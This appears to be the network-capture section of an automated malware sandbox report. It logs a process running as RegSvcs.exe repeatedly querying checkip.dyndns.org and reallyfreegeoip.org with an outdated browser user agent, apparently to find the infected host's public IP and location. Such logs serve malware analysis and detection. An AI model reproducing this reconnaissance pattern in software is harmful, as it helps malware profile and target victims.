                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549709193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:45.486644030 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:46.146157980 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:46 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549711193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:46.772192001 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:47.427202940 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:47 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549713193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:48.080365896 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:48.744534969 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:48 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.549716193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:49.375657082 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:50.033744097 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:49 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.549723193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:50.783591986 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:51.420068979 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:51 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.549737193.122.6.168802804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:52.076690912 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:52.705743074 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.555408193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:56.952271938 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:27:57.622175932 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:57 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 11, 2025 01:27:57.625521898 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:57.811250925 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:57 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 11, 2025 01:27:58.499219894 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:58.685503960 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:58 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.555426193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:27:59.344325066 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:27:59.993185043 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:59 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.555438193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:00.647021055 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:28:01.276916027 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:01 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.555446193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:01.913901091 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 11, 2025 01:28:02.579885006 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:02 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.555457193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:03.217564106 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:28:03.861819983 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:03 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.555469193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:04.599520922 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:28:05.243896961 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:05 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.555479193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:05.911247015 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:28:06.551422119 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:06 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.555488193.122.6.168806148C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 11, 2025 01:28:07.141972065 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 11, 2025 01:28:07.777970076 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:28:07 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549705104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-11 00:27:43 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:43 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870052
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0XXk8Q3wmonYwixIekJjYcePpM67o1M4bKNXLwDIjDnH7bERlx%2BeClTHnQFpfAlBxAkUzeWy9%2Bfs8uX%2BDcqu47rN1eIKkUl1wZFqEkHQSWslOKpEbkENw1v%2Bv0SeCLsCtRzoJLg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c85a89e57d0e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2012&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1399808&cwnd=244&unsent_bytes=0&cid=b294c54046f5e1b3&ts=205&x=0"
                                                                                                                  2025-01-11 00:27:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549706104.21.80.14432804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-11 00:27:43 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-11 00:27:44 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 11 Jan 2025 00:27:43 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1870053
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vee1RkHoalnXP62gi3949jMeps3uIkKFihF4yIerJ%2Bup8y1dyIIhj7TWKzjkjFsM4P0VvgpwnqqsJ7wYBaydRbJVEUOFweWF%2FJ2eKOES87GAv01C9itnSuL1%2B6JhBPC3ysA99WhJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 9000c85fcd2c42d2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1533&min_rtt=1525&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1834170&cwnd=229&unsent_bytes=0&cid=f87d35a9e2b25681&ts=155&x=0"
